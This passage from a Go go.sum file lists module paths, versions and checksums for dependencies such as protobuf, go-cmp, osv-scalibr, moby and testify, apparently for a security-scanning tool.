v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= github.com/golang/protobuf v1.5.4 h1:i7eJL8qZTpSEXOPTxNKhASYpMn+8e5Q6AdndVa1dWek= github.com/golang/protobuf v1.5.4/go.mod h1:lnTiLA8Wa4RWRcIUkrtSVa5nRhsEGBg48fD6rSs7xps= github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= github.com/google/go-cmp v0.5.9/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY= github.com/google/go-cmp v0.7.0 h1:wk8382ETsv4JYUZwIsn6YpYiWiBsYLSJiTsyBybVuN8= github.com/google/go-cmp v0.7.0/go.mod h1:pXiqmnSA92OHEEa9HXL2W4E7lf9JzCmGVUdgjX3N/iU= github.com/google/go-containerregistry v0.20.6 h1:cvWX87UxxLgaH76b4hIvya6Dzz9qHB31qAwjAohdSTU= github.com/google/go-containerregistry v0.20.6/go.mod h1:T0x8MuoAoKX/873bkeSfLD2FAkwCDf9/HZgsFJ02E2Y= github.com/google/go-cpy v0.0.0-20211218193943-a9c933c06932 h1:5/4TSDzpDnHQ8rKEEQBjRlYx77mHOvXu08oGchxej7o= github.com/google/go-cpy v0.0.0-20211218193943-a9c933c06932/go.mod h1:cC6EdPbj/17GFCPDK39NRarlMI+kt+O60S12cNB5J9Y= github.com/google/jsonschema-go v0.4.2 h1:tmrUohrwoLZZS/P3x7ex0WAVknEkBZM46iALbcqoRA8= github.com/google/jsonschema-go v0.4.2/go.mod h1:r5quNTdLOYEz95Ru18zA0ydNbBuYoo9tgaYcxEYhJVE= 
github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9 h1:bOqoTMcFFJf0yuXgH+EdPWzcgIIUzyCWxT/agq2u4lw= github.com/google/osv-scalibr v0.4.6-0.20260318175007-ec4239d68fb9/go.mod h1:0yLzHje112PqLC/q9GKwcmaKrKWotOvc49xc+SegKV0= github.com/google/pprof v0.0.0-20250403155104-27863c87afa6 h1:BHT72Gu3keYf3ZEu2J0b1vyeLSOYI8bm5wbJM/8yDe8= github.com/google/pprof v0.0.0-20250403155104-27863c87afa6/go.mod h1:boTsfXsheKC2y+lKOCMpSfarhxDeIzfZG1jqGcPl3cA= github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/google/uuid v1.6.0 h1:NIvaJDMOsjHA8n1jAhLSgzrAzy1Hgr+hNrb57e+94F0= github.com/google/uuid v1.6.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= github.com/gorilla/css v1.0.1 h1:ntNaBIghp6JmvWnxbZKANoLyuXTPZ4cAMlo6RyhlbO8= github.com/gorilla/css v1.0.1/go.mod h1:BvnYkspnSzMmwRK+b8/xgNPLiIuNZr6vbZBTPQ2A3b0= github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1 h1:e9Rjr40Z98/clHv5Yg79Is0NtosR5LXRvdr7o/6NwbA= github.com/grpc-ecosystem/grpc-gateway/v2 v2.26.1/go.mod h1:tIxuGz/9mpox++sgp9fJjHO0+q1X9/UOWd798aAm22M= github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM= github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg= github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f h1:Fnl4pzx8SR7k7JuzyW8lEtSFH6EQ8xgcypgIn8pcGIE= github.com/ianlancetaylor/demangle v0.0.0-20251118225945-96ee0021ea0f/go.mod h1:gx7rwoVhcfuVKG5uya9Hs3Sxj7EIvldVofAWIUtGouw= github.com/icholy/digest v1.1.0 h1:HfGg9Irj7i+IX1o1QAmPfIBNu/Q5A5Tu3n/MED9k9H4= github.com/icholy/digest v1.1.0/go.mod h1:QNrsSGQ5v7v9cReDI0+eyjsXGUoRSUZQHeQ5C4XLa0Y= github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99 h1:BQSFePA1RWJOlocH6Fxy8MmwDt+yVQYULKfN0RoTN8A= github.com/jbenet/go-context v0.0.0-20150711004518-d14ea06fba99/go.mod h1:1lJo3i6rXxKeerYnT8Nvf0QmHCRC1n8sfWVwXF2Frvo= github.com/jedib0t/go-pretty/v6 v6.7.8 h1:BVYrDy5DPBA3Qn9ICT+PokP9cvCv1KaHv2i+Hc8sr5o= 
github.com/jedib0t/go-pretty/v6 v6.7.8/go.mod h1:YwC5CE4fJ1HFUDeivSV1r//AmANFHyqczZk+U6BDALU= github.com/jessevdk/go-flags v1.4.0/go.mod h1:4FA24M0QyGHXBuZZK/XkWh8h0e1EYbRYJSGM75WSRxI= github.com/kevinburke/ssh_config v1.2.0 h1:x584FjTGwHzMwvHx18PXxbBVzfnxogHaAReU4gf13a4= github.com/kevinburke/ssh_config v1.2.0/go.mod h1:CT57kijsi8u/K/BOFA39wgDQJ9CxiF4nAY/ojJ6r6mM= github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/klauspost/compress v1.18.0 h1:c/Cqfb0r+Yi+JtIEq73FWXVkRonBlf0CRNYc8Zttxdo= github.com/klauspost/compress v1.18.0/go.mod h1:2Pp+KzxcywXVXMr50+X0Q/Lsb43OQHYWRCY2AiWywWQ= github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= github.com/kr/pretty v0.3.1 h1:flRD4NNwYAUpkphVc1HcthR4KEIFJ65n8Mw5qdRn3LE= github.com/kr/pretty v0.3.1/go.mod h1:hoEshYVHaxMs3cyo3Yncou5ZscifuDolrwPKZanG3xk= github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= github.com/kr/text v0.2.0 h1:5Nx0Ya0ZqY2ygV366QzturHI13Jq95ApcVaJBhpS+AY= github.com/kr/text v0.2.0/go.mod h1:eLer722TekiGuMkidMxC/pM04lWEeraHUUmBw8l2grE= github.com/kylelemons/godebug v1.1.0 h1:RPNrshWIDI6G2gRW9EHilWtl7Z6Sb1BR0xunSBf0SNc= github.com/kylelemons/godebug v1.1.0/go.mod h1:9/0rRGxNHcop5bhtWyNeEfOS8JIWk580+fNqagV/RAw= github.com/lucasb-eyer/go-colorful v1.3.0 h1:2/yBRLdWBZKrf7gB40FoiKfAWYQ0lqNcbuQwVHXptag= github.com/lucasb-eyer/go-colorful v1.3.0/go.mod h1:R4dSotOR9KMtayYi1e77YzuveK+i7ruzyGqttikkLy0= github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40 h1:EnfXoSqDfSNJv0VBNqY/88RNnhSGYkrHaO0mmFGbVsc= github.com/lunixbochs/struc v0.0.0-20200707160740-784aaebc1d40/go.mod h1:vy1vK6wD6j7xX6O6hXe621WabdtNkou2h7uRtTfRMyg= github.com/maruel/natural v1.1.1 h1:Hja7XhhmvEFhcByqDoHz9QZbkWey+COd9xWfCfn1ioo= github.com/maruel/natural v1.1.1/go.mod 
h1:v+Rfd79xlw1AgVBjbO0BEQmptqb5HvL/k9GRHB7ZKEg= github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd h1:JEIW94K3spsvBI5Xb9PGhKSIza9/jxO1lF30tPCAJlA= github.com/masahiro331/go-ext4-filesystem v0.0.0-20240620024024-ca14e6327bbd/go.mod h1:3XMMY1M486mWGTD13WPItg6FsgflQR72ZMAkd+gsyoQ= github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY= github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y= github.com/mattn/go-runewidth v0.0.12/go.mod h1:RAqKPSqVFrSLVXbA8x7dzmKdmGzieGRCM46jaSJTDAk= github.com/mattn/go-runewidth v0.0.20 h1:WcT52H91ZUAwy8+HUkdM3THM6gXqXuLJi9O3rjcQQaQ= github.com/mattn/go-runewidth v0.0.20/go.mod h1:XBkDxAl56ILZc9knddidhrOlY5R/pDhgLpndooCuJAs= github.com/mattn/go-shellwords v1.0.12 h1:M2zGm7EW6UQJvDeQxo4T51eKPurbeFbe8WtebGE2xrk= github.com/mattn/go-shellwords v1.0.12/go.mod h1:EZzvwXDESEeg03EKmM+RmDnNOPKG4lLtQsUlTZDWQ8Y= github.com/microcosm-cc/bluemonday v1.0.27 h1:MpEUotklkwCSLeH+Qdx1VJgNqLlpY2KXwXFM08ygZfk= github.com/microcosm-cc/bluemonday v1.0.27/go.mod h1:jFi9vgW+H7c3V0lb6nR74Ib/DIB5OBs92Dimizgw2cA= github.com/micromdm/plist v0.2.1 h1:4SoSMOVAyzv1ThT8IKLgXLJEKezLkcVDN6wivqTTFdo= github.com/micromdm/plist v0.2.1/go.mod h1:flkfm0od6GzyXBqI28h5sgEyi3iPO28W2t1Zm9LpwWs= github.com/mitchellh/go-homedir v1.1.0 h1:lukF9ziXFxDFPkA1vsr5zpc1XuPDn/wFntq5mG+4E0Y= github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= github.com/moby/buildkit v0.23.2 h1:gt/dkfcpgTXKx+B9I310kV767hhVqTvEyxGgI3mqsGQ= github.com/moby/buildkit v0.23.2/go.mod h1:iEjAfPQKIuO+8y6OcInInvzqTMiKMbb2RdJz1K/95a0= github.com/moby/docker-image-spec v1.3.1 h1:jMKff3w6PgbfSa69GfNg+zN/XLhfXJGnEx3Nl2EsFP0= github.com/moby/docker-image-spec v1.3.1/go.mod h1:eKmb5VW8vQEh/BAr2yvVNvuiJuY6UIocYsFu/DxxRpo= github.com/moby/locker v1.0.1 h1:fOXqR41zeveg4fFODix+1Ch4mj/gT0NE1XJbp/epuBg= github.com/moby/locker v1.0.1/go.mod h1:S7SDdo5zpBK84bzzVlKr2V0hz+7x9hWbYC/kq7oQppc= 
github.com/moby/sys/atomicwriter v0.1.0 h1:kw5D/EqkBwsBFi0ss9v1VG3wIkVhzGvLklJ+w3A14Sw= github.com/moby/sys/atomicwriter v0.1.0/go.mod h1:Ul8oqv2ZMNHOceF643P6FKPXeCmYtlQMvpizfsSoaWs= github.com/moby/sys/mountinfo v0.7.2 h1:1shs6aH5s4o5H2zQLn796ADW1wMrIwHsyJ2v9KouLrg= github.com/moby/sys/mountinfo v0.7.2/go.mod h1:1YOa8w8Ih7uW0wALDUgT1dTTSBrZ+HiBLGws92L2RU4= github.com/moby/sys/sequential v0.6.0 h1:qrx7XFUd/5DxtqcoH1h438hF5TmOvzC/lspjy7zgvCU= github.com/moby/sys/sequential v0.6.0/go.mod h1:uyv8EUTrca5PnDsdMGXhZe6CCe8U/UiTWd+lL+7b/Ko= github.com/moby/sys/signal v0.7.1 h1:PrQxdvxcGijdo6UXXo/lU/TvHUWyPhj7UOpSo8tuvk0= github.com/moby/sys/signal v0.7.1/go.mod h1:Se1VGehYokAkrSQwL4tDzHvETwUZlnY7S5XtQ50mQp8= github.com/moby/sys/user v0.4.0 h1:jhcMKit7SA80hivmFJcbB1vqmw//wU61Zdui2eQXuMs= github.com/moby/sys/user v0.4.0/go.mod h1:bG+tYYYJgaMtRKgEmuueC0hJEAZWwtIbZTB+85uoHjs= github.com/moby/sys/userns v0.1.0 h1:tVLXkFOxVu9A64/yh59slHVv9ahO9UIev4JZusOLG/g= github.com/moby/sys/userns v0.1.0/go.mod h1:IHUYgu/kao6N8YZlp9Cf444ySSvCmDlmzUcYfDHOl28= github.com/moby/term v0.0.0-20221205130635-1aeaba878587 h1:HfkjXDfhgVaN5rmueG8cL8KKeFNecRCXFhaJ2qZ5SKA= github.com/moby/term v0.0.0-20221205130635-1aeaba878587/go.mod h1:8FzsFHVUBGZdbDsJw/ot+X+d5HLUbvklYLJ9uGfcI3Y= github.com/modelcontextprotocol/go-sdk v1.4.1 h1:M4x9GyIPj+HoIlHNGpK2hq5o3BFhC+78PkEaldQRphc= github.com/modelcontextprotocol/go-sdk v1.4.1/go.mod h1:Bo/mS87hPQqHSRkMv4dQq1XCu6zv4INdXnFZabkNU6s= github.com/mohae/deepcopy v0.0.0-20170929034955-c48cc78d4826 h1:RWengNIwukTxcDr9M+97sNutRR1RKhG96O6jWumTTnw= github.com/mohae/deepcopy v0.0.0-20170929034955-c48cc78d4826/go.mod h1:TaXosZuwdSHYgviHp1DAtfrULt5eUgsSMsZf+YrPgl8= github.com/morikuni/aec v1.0.0 h1:nP9CBfwrvYnBRgY6qfDQkygYDmYwOilePFkwzv4dU8A= github.com/morikuni/aec v1.0.0/go.mod h1:BbKIizmSmc5MMPqRYbxO4ZU0S0+P200+tUnFx7PXmsc= github.com/muesli/cancelreader v0.2.2 h1:3I4Kt4BQjOR54NavqnDogx/MIoWBFa0StPA8ELUXHmA= github.com/muesli/cancelreader v0.2.2/go.mod 
h1:3XuTXfFS2VjM+HTLZY9Ak0l6eUKfijIfMUZ4EgX0QYo= github.com/muesli/reflow v0.3.0 h1:IFsN6K9NfGtjeggFP+68I4chLZV2yIKsXJFNZ+eWh6s= github.com/muesli/reflow v0.3.0/go.mod h1:pbwTDkVPibjO2kyvBQRBxTWEEGDGq0FlB1BIKtnHY/8= github.com/ncruces/go-strftime v0.1.9 h1:bY0MQC28UADQmHmaF5dgpLmImcShSi2kHU9XLdhx/f4= github.com/ncruces/go-strftime v0.1.9/go.mod h1:Fwc5htZGVVkseilnfgOVb9mKy6w1naJmn9CehxcKcls= github.com/onsi/gomega v1.34.1 h1:EUMJIKUjM8sKjYbtxQI9A4z2o+rruxnzNvpknOXie6k= github.com/onsi/gomega v1.34.1/go.mod h1:kU1QgUvBDLXBJq618Xvm2LUX6rSAfRaFRTcdOeDLwwY= github.com/opencontainers/go-digest v1.0.0 h1:apOUWs51W5PlhuyGyz9FCeeBIOUDA/6nW8Oi/yOhh5U= github.com/opencontainers/go-digest v1.0.0/go.mod h1:0JzlMkj0TRzQZfJkVvzbP0HBR3IKzErnv2BNG4W4MAM= github.com/opencontainers/image-spec v1.1.1 h1:y0fUlFfIZhPF1W537XOLg0/fcx6zcHCJwooC2xJA040= github.com/opencontainers/image-spec v1.1.1/go.mod h1:qpqAh3Dmcf36wStyyWU+kCeDgrGnAve2nCC8+7h8Q0M= github.com/opencontainers/runtime-spec v1.2.1 h1:S4k4ryNgEpxW1dzyqffOmhI1BHYcjzU8lpJfSlR0xww= github.com/opencontainers/runtime-spec v1.2.1/go.mod h1:jwyrGlmzljRJv/Fgzds9SsS/C5hL+LL3ko9hs6T5lQ0= github.com/opencontainers/selinux v1.13.0 h1:Zza88GWezyT7RLql12URvoxsbLfjFx988+LGaWfbL84= github.com/opencontainers/selinux v1.13.0/go.mod h1:XxWTed+A/s5NNq4GmYScVy+9jzXhGBVEOAyucdRUY8s= github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4 h1:4zC49SlXs2waAuZJFEP1lAGf9Bgjg8SQww6y8C9znJ0= github.com/ossf/osv-schema/bindings/go v0.0.0-20260304051245-ec3272c283e4/go.mod h1:NJzqZPEfOy3B1dWe9pKRtmxJ/UF1++6apnQLjz3du8E= github.com/owenrumney/go-sarif/v3 v3.3.0 h1:p5oSxEV0uPWBRpAspTmwWr4t1YZyKUpdoFzSB7WE90A= github.com/owenrumney/go-sarif/v3 v3.3.0/go.mod h1:72MaugkExDexbSauRuPq6BvUAAqAX0TwoNYMIQyZCMw= github.com/package-url/packageurl-go v0.1.5 h1:O4efRXja2XQ5CtiiYiCZ22k/m7i5ugLiAghgcC+eDgk= github.com/package-url/packageurl-go v0.1.5/go.mod h1:nKAWB8E6uk1MHqiS/lQb9pYBGH2+mdJ2PJc2s50dQY0= github.com/pandatix/go-cvss v0.6.2 
h1:TFiHlzUkT67s6UkelHmK6s1INKVUG7nlKYiWWDTITGI= github.com/pandatix/go-cvss v0.6.2/go.mod h1:jDXYlQBZrc8nvrMUVVvTG8PhmuShOnKrxP53nOFkt8Q= github.com/pierrec/lz4/v4 v4.1.17 h1:kV4Ip+/hUBC+8T6+2EgburRtkE9ef4nbY3f4dFhGjMc= github.com/pierrec/lz4/v4 v4.1.17/go.mod h1:gZWDp/Ze/IJXGXf23ltt2EXimqmTUXEy0GFuRQyBid4= github.com/pjbgf/sha1cd v0.4.0 h1:NXzbL1RvjTUi6kgYZCX3fPwwl27Q1LJndxtUDVfJGRY= github.com/pjbgf/sha1cd v0.4.0/go.mod h1:zQWigSxVmsHEZow5qaLtPYxpcKMMQpa09ixqBxuCS6A= github.com/pkg/diff v0.0.0-20210226163009-20ebb0f2a09e/go.mod h1:pJLUxLENpZxwdsKMEsNbx1VGcRFpLqf3715MtcvvzbA= github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/errors v0.9.1 h1:FEBLx1zS214owpjy7qsBeixbURkuhQAwrK5UwLGTwt4= github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= github.com/pkg/xattr v0.4.9 h1:5883YPCtkSd8LFbs13nXplj9g9tlrwoJRjgpgMu1/fE= github.com/pkg/xattr v0.4.9/go.mod h1:di8WF84zAKk8jzR1UBTEWh9AUlIZZ7M/JNt8e9B6ktU= github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10 h1:GFCKgmp0tecUJ0sJuv4pzYCqS9+RGSn52M3FUwPs+uo= github.com/planetscale/vtprotobuf v0.6.1-0.20240319094008-0393e58bdf10/go.mod h1:t/avpk3KcrXxUnYOhZhMXJlSEyie6gQbtLq5NM3loB8= github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2 h1:Jamvg5psRIccs7FGNTlIRMkT8wgtp5eCXdBlqhYGL6U= github.com/pmezard/go-difflib v1.0.1-0.20181226105442-5d4384ee4fb2/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= github.com/prometheus/procfs v0.15.1 h1:YagwOFzUgYfKKHX6Dr+sHT7km/hxC76UB0learggepc= github.com/prometheus/procfs v0.15.1/go.mod h1:fB45yRUv8NstnjriLhBQLuOUt+WW4BsoGhij/e3PBqk= github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec h1:W09IVJc94icq4NjY3clb7Lk8O1qJ8BdBEF8z0ibU0rE= 
github.com/remyoudompheng/bigfft v0.0.0-20230129092748-24d4a6f8daec/go.mod h1:qqbHyh8v60DhA7CoWK5oRCqLrMHRGoxYCSS9EjAz6Eo= github.com/rivo/uniseg v0.1.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc= github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ= github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88= github.com/rogpeppe/go-internal v1.9.0/go.mod h1:WtVeX8xhTBvf0smdhujwtBcq4Qrzq/fJaraNFVN+nFs= github.com/rogpeppe/go-internal v1.14.1 h1:UQB4HGPB6osV0SQTLymcB4TgvyWu6ZyliaW0tI/otEQ= github.com/rogpeppe/go-internal v1.14.1/go.mod h1:MaRKkUm5W0goXpeCfT7UZI6fk/L7L7so1lCWt35ZSgc= github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c h1:8gOLsYwaY2JwlTMT4brS5/9XJdrdIbmk2obvQ748CC0= github.com/rust-secure-code/go-rustaudit v0.0.0-20250226111315-e20ec32e963c/go.mod h1:kwM/7r/rVluTE8qJbHAffduuqmSv4knVQT2IajGvSiA= github.com/saferwall/pe v1.5.7 h1:fxlRLvhyr+3cIs1yturWhWmgACIu147o+xSEYFlUAyA= github.com/saferwall/pe v1.5.7/go.mod h1:mJx+PuptmNpoPFBNhWs/uDMFL/kTHVZIkg0d4OUJFbQ= github.com/sahilm/fuzzy v0.1.1 h1:ceu5RHF8DGgoi+/dR5PsECjCDH1BE3Fnmpo7aVXOdRA= github.com/sahilm/fuzzy v0.1.1/go.mod h1:VFvziUEIMCrT6A6tw2RFIXPXXmzXbOsSHF0DOI8ZK9Y= github.com/santhosh-tekuri/jsonschema/v6 v6.0.1 h1:PKK9DyHxif4LZo+uQSgXNqs0jj5+xZwwfKHgph2lxBw= github.com/santhosh-tekuri/jsonschema/v6 v6.0.1/go.mod h1:JXeL+ps8p7/KNMjDQk3TCwPpBy0wYklyWTfbkIzdIFU= github.com/sebdah/goldie v1.0.0 h1:9GNhIat69MSlz/ndaBg48vl9dF5fI+NBB6kfOxgfkMc= github.com/sebdah/goldie v1.0.0/go.mod h1:jXP4hmWywNEwZzhMuv2ccnqTSFpuq8iyQhtQdkkZBH4= github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d h1:RQqyEogx5J6wPdoxqL132b100j8KjcVHO1c0KLRoIhc= github.com/secDre4mer/pkcs7 v0.0.0-20240322103146-665324a4461d/go.mod h1:PegD7EVqlN88z7TpCqH92hHP+GBpfomGCCnw1PFtNOA= github.com/segmentio/asm v1.1.3 h1:WM03sfUOENvvKexOLp+pCqgb/WDjsi7EK8gIsICtzhc= 
github.com/segmentio/asm v1.1.3/go.mod h1:Ld3L4ZXGNcSLRg4JBsZ3//1+f/TjYl0Mzen/DQy1EJg= github.com/segmentio/encoding v0.5.4 h1:OW1VRern8Nw6ITAtwSZ7Idrl3MXCFwXHPgqESYfvNt0= github.com/segmentio/encoding v0.5.4/go.mod h1:HS1ZKa3kSN32ZHVZ7ZLPLXWvOVIiZtyJnO1gPH1sKt0= github.com/sergi/go-diff v1.4.0 h1:n/SP9D5ad1fORl+llWyN+D6qoUETXNZARKjyY2/KVCw= github.com/sergi/go-diff v1.4.0/go.mod h1:A0bzQcvG0E7Rwjx0REVgAGH58e96+X0MeOfepqsbeW4= github.com/shirou/gopsutil v3.21.11+incompatible h1:+1+c1VGhc88SSonWP6foOcLhvnKlUeu/erjjvaPEYiI= github.com/shirou/gopsutil v3.21.11+incompatible/go.mod h1:5b4v6he4MtMOwMlS0TUMTu2PcXUg8+E1lC7eC3UO/RA= github.com/sirupsen/logrus v1.7.0/go.mod h1:yWOB1SBYBC5VeMP7gHvWumXLIWorT60ONWic61uBYv0= github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af h1:Sp5TG9f7K39yfB+If0vjp97vuT74F72r8hfRpP8jLU0= github.com/sirupsen/logrus v1.9.4-0.20230606125235-dd1b4c2e81af/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ= github.com/skeema/knownhosts v1.3.1 h1:X2osQ+RAjK76shCbvhHHHVl3ZlgDm8apHEHFqRjnBY8= github.com/skeema/knownhosts v1.3.1/go.mod h1:r7KTdC8l4uxWRyK2TpQZ/1o5HaSzh06ePQNxPwTcfiY= github.com/spdx/gordf v0.0.0-20201111095634-7098f93598fb/go.mod h1:uKWaldnbMnjsSAXRurWqqrdyZen1R7kxl8TkmWk2OyM= github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb h1:7G2Czq97VORM5xNRrD8tSQdhoXPRs8s+Otlc7st9TS0= github.com/spdx/gordf v0.0.0-20250128162952-000978ccd6fb/go.mod h1:uKWaldnbMnjsSAXRurWqqrdyZen1R7kxl8TkmWk2OyM= github.com/spdx/tools-golang v0.5.5 h1:61c0KLfAcNqAjlg6UNMdkwpMernhw3zVRwDZ2x9XOmk= github.com/spdx/tools-golang v0.5.5/go.mod h1:MVIsXx8ZZzaRWNQpUDhC4Dud34edUYJYecciXgrw5vE= github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= github.com/stretchr/objx v0.4.0/go.mod h1:YvHI0jy2hoMjB+UWwv71VJQ9isScKT/TqJzVSSt89Yw= github.com/stretchr/objx v0.5.0/go.mod h1:Yh+to48EsGEfYuaHDzXPcE3xhTkx73EhmCGUpEOglKo= github.com/stretchr/objx v0.5.2/go.mod h1:FRsXN1f5AsAjCGJKqEizvkpNtU+EGNCLh3NxZ/8L+MA= 
github.com/stretchr/testify v1.2.2/go.mod h1:a8OnRcib4nhh0OaRAV+Yts87kKdq0PP7pXfy6kDkUVs= github.com/stretchr/testify v1.3.0/go.mod h1:M5WIy9Dh21IEIfnGCwXGc5bZfKNJtfHm1UVUgZn+9EI= github.com/stretchr/testify v1.4.0/go.mod h1:j7eGeouHqKxXV5pUuKE4zz7dFj8WfuZ+81PSLYec5m4= github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.7.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= github.com/stretchr/testify v1.8.0/go.mod h1:yNjHg4UonilssWZ8iaSj1OCr/vHnekPRkoO+kdMU+MU= github.com/stretchr/testify v1.8.1/go.mod h1:w2LPCIKwWwSfY2zedu0+kehJoqGctiVI29o6fzry7u4= github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo= github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY= github.com/stretchr/testify v1.11.1 h1:7s2iGBzp5EwR7/aIZr8ao5+dra3wiQyKjjFuvgVKu7U= github.com/stretchr/testify v1.11.1/go.mod h1:wZwfW3scLgRK+23gO65QZefKpKQRnfz6sD981Nm4B6U= github.com/terminalstatic/go-xsd-validate v0.1.6 h1:TenYeQ3eY631qNi1/cTmLH/s2slHPRKTTHT+XSHkepo= github.com/terminalstatic/go-xsd-validate v0.1.6/go.mod h1:18lsvYFofBflqCrvo1umpABZ99+GneNTw2kEEc8UPJw= github.com/thoas/go-funk v0.9.3 h1:7+nAEx3kn5ZJcnDm2Bh23N2yOtweO14bi//dvRtgLpw= github.com/thoas/go-funk v0.9.3/go.mod h1:+IWnUfUmFO1+WVYQWQtIJHeRRdaIyyYglZN7xzUPe4Q= github.com/tidwall/gjson v1.14.2/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= github.com/tidwall/gjson v1.18.0 h1:FIDeeyB800efLX89e5a8Y0BNH+LOngJyGrIWxG2FKQY= github.com/tidwall/gjson v1.18.0/go.mod h1:/wbyibRr2FHMks5tjHJ5F8dMZh3AcwJEMf5vlfC0lxk= github.com/tidwall/jsonc v0.3.2 h1:ZTKrmejRlAJYdn0kcaFqRAKlxxFIC21pYq8vLa4p2Wc= github.com/tidwall/jsonc v0.3.2/go.mod h1:dw+3CIxqHi+t8eFSpzzMlcVYxKp08UP5CD8/uSFCyJE= github.com/tidwall/match v1.1.1 h1:+Ho715JplO36QYgwN9PGYNhgZvoUSc9X2c80KVTi+GA= github.com/tidwall/match v1.1.1/go.mod h1:eRSPERbgtNPcGhD8UCthc6PmLEQXEWd3PRB5JTxsfmM= github.com/tidwall/pretty v1.2.0/go.mod 
